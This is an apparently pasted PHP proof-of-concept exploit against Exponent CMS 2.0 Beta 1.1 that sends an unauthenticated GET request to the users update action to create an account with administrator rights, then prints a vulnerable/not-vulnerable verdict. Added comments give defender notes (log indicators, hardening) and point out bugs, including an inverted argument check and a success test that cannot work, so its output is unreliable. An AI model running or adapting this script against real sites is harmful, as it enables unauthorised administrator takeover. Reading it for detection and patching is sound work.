Googleinurl

[EXPLOIT] Exponent CMS 2.0 Beta 1.1 CSRF Add ADM A

Dec 14th, 2014
  1. <?php
      // Command-line proof-of-concept script, reproduced as pasted. It builds one GET URL that calls the
      // update action of the CMS users module with is_acting_admin=1 and prepares to send it to the
      // host matched from argv[1].
      // Defender's reading: every account field, including the privilege flag, travels as a query
      // parameter, and the request built here carries no anti-CSRF token. Hardening on the application
      // side means accepting such changes only via POST with a per-session token and never taking
      // privilege fields from request input (general guidance; the CMS code is not shown here).
      // Log indicators visible in this script: requests to /exponent/index.php with
      // module=users&action=update and is_acting_admin=1, and an account named as in $config['user'].
  2.  
      // Runtime setup: report E_ERROR only, display errors, no execution time limit, flush output as it
      // is printed. NOTE(review): allow_url_fopen is normally not changeable via ini_set() - confirm.
  3. error_reporting(1);
  4. set_time_limit(0);
  5. ini_set('display_errors', 1);
  6. ini_set('max_execution_time', 0);
  7. ini_set('allow_url_fopen', 1);
  8. ob_implicit_flush(true);
  9. ob_end_flush();
  10. //Exponent CMS 2.0 Beta 1.1 CSRF Add Administrator Account
  11. //http://www.exploit-db.com/exploits/17235/
      // As written, this guard exits with the usage error when argv[1] is NOT empty (the test is
      // !empty); the NULL branch prints nothing.
  12. print !empty($argv[1]) ? exit('0x[ERROR]: DEFINA URL') : NULL;
      // Prepends http:// when argv[1] does not contain 'http'.
  13. $argv[1] =  isset($argv[1]) && strstr($argv[1],'http') ? $argv[1] : "http://{$argv[1]}";
      // Requires a URL-looking match in argv[1], otherwise exits; matches are stored in $alvo_
      // ('alvo' is Portuguese for target).
  14. !(preg_match_all("#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i", $argv[1], $alvo_)) ? exit('0x[ERROR]: DEFINA URL') : NULL;
      // Separator line reused by the console output.
  15. $line = "\n------------------------------------------------------------------------------------------------------------------";
      // First full match becomes the base address the request path is appended to.
  16. $config['alvo'] = $alvo_[0][0];
      // Hard-coded fields of the account the request asks the CMS to write.
  17. $config['user'] = 'inurlbr';
  18. $config['pass1'] = 'brbr';
  19. $config['pass2'] = 'brbr';
  20. $config['email'] = 'you@mail.com';
  21. $config['firstname'] = 'name';
  22. $config['lastname'] = 'las name';
  23.  
      // Path and query string of the state-changing request; the values above are interpolated as-is.
  24. $config['exploit'] = "/exponent/index.php?module=users&action=update&username={$config['user']}&pass1={$config['pass1']}&pass2={$config['pass2']}&email={$config['email']}&firstname={$config['firstname']}&lastname={$config['lastname']}&is_acting_admin=1";
      // Full request URL = matched base + path.
  25. $exec = $config['alvo'] . $config['exploit'];
      // Fetches the response headers for argv[1] as an associative array (second argument 1).
  26. $headers = get_headers($argv[1], 1);
  27. print "\r\n0x[EXPLOIT NAME]: Exponent CMS 2.0 Beta 1.1 CSRF Add Administrator Account / INURL - BRASIL";
  28. print $line;
      // NOTE(review): in date(), 'm' is the month and 'i' is minutes, so "h:m:s" prints
      // hour:month:second on every timestamp in this script.
  29. print "\n0x " . date("h:m:s") . " [INFO]: ";
      // First header entry, plus the entry at index 1 when one exists.
  30. print $headers[0] . (isset($headers[1]) ? ' -> ' . $headers[1] : NULL);
  31. print "\n0x " . date("h:m:s") . " [INFO]: ";
      // Server and X-Powered-By are read without checking that the key exists; when the value is an
      // array only its first element is printed.
  32. is_array($headers['Server']) ? print_r($headers['Server'][0]) : print_r($headers['Server']);
  33. print "\n0x " . date("h:m:s") . " [INFO]: ";
  34. is_array($headers['X-Powered-By']) ? print_r($headers['X-Powered-By'][0]) : print_r($headers['X-Powered-By']);
  35. print "\n0x " . date("h:m:s") . " [INFO]: TARGET: {$alvo_[0][0]}";
  36.  
  37. function __request($url) {
      // Sends a single GET request to $url with cURL and returns the raw response as a string,
      // response headers included (CURLOPT_HEADER) because CURLOPT_RETURNTRANSFER is set.
      // The curl_exec() result is returned unchecked, so a failed transfer yields false, and the
      // handle is never closed.
      // No cookie, credential or token option is set on the handle, so the request carries no
      // authenticated session.
      // The fixed User-Agent string below is a usable indicator when searching web access logs.
  38.  
  39.     $objcurl = curl_init();
  40.     curl_setopt($objcurl, CURLOPT_URL, $url);
  41.     curl_setopt($objcurl, CURLOPT_HEADER, 1);
  42.     curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
  43.     curl_setopt($objcurl, CURLOPT_USERAGENT, "::INURLBR::/1.0.1 (compatible; MSIE 5.01; Linux 5.0)");
  44.     $corpo = curl_exec($objcurl);
  45.     return ($corpo);
  46. }
  47.  
      // Sends the request built above and keeps the raw response (headers + body).
  48. $rest = __request($exec);
      // Collects "Server:..." lines from the response into $status['server']; the pattern uses
      // parentheses as its delimiters, and the result is an array of match arrays.
  49. preg_match_all('(Server:.*)', $rest, $status['server']);
  50. print $line;
      // Verdict heuristic: the response must not contain 'Resource Not Found' and '200' must be found
      // in $status['server'].
      // NOTE(review): strstr() is handed the preg_match_all() result array rather than a string, and
      // the pattern captures Server header lines, not the status line, so this verdict is not a
      // reliable signal either way. It also does not confirm that an account was written: __request()
      // sends no authenticated session with the request.
  51. if (!strstr($rest, 'Resource Not Found') && strstr($status['server'], '200')) {
  52.     $file = "\n0x " . date("h:m:s") . " [INFO][EXPLOIT]:: {$config['exploit']}";
  53.     $file.= "\n0x " . date("h:m:s") . " [INFO][RESULTADO]:: {IS VULL}";
  54.     print $file;
      // Appends the result to lfd.txt in the current working directory.
  55.     file_put_contents('lfd.txt', "{$line}{$file}{$line}\n", FILE_APPEND);
  56. } else {
  57.     print "\n0x " . date("h:m:s") . " [INFO][RESULTADO]:: {NOT VULL}";
  58. }
  59.  
  60. print $line;
      // Dumps the full raw response to the console.
  61. print $rest;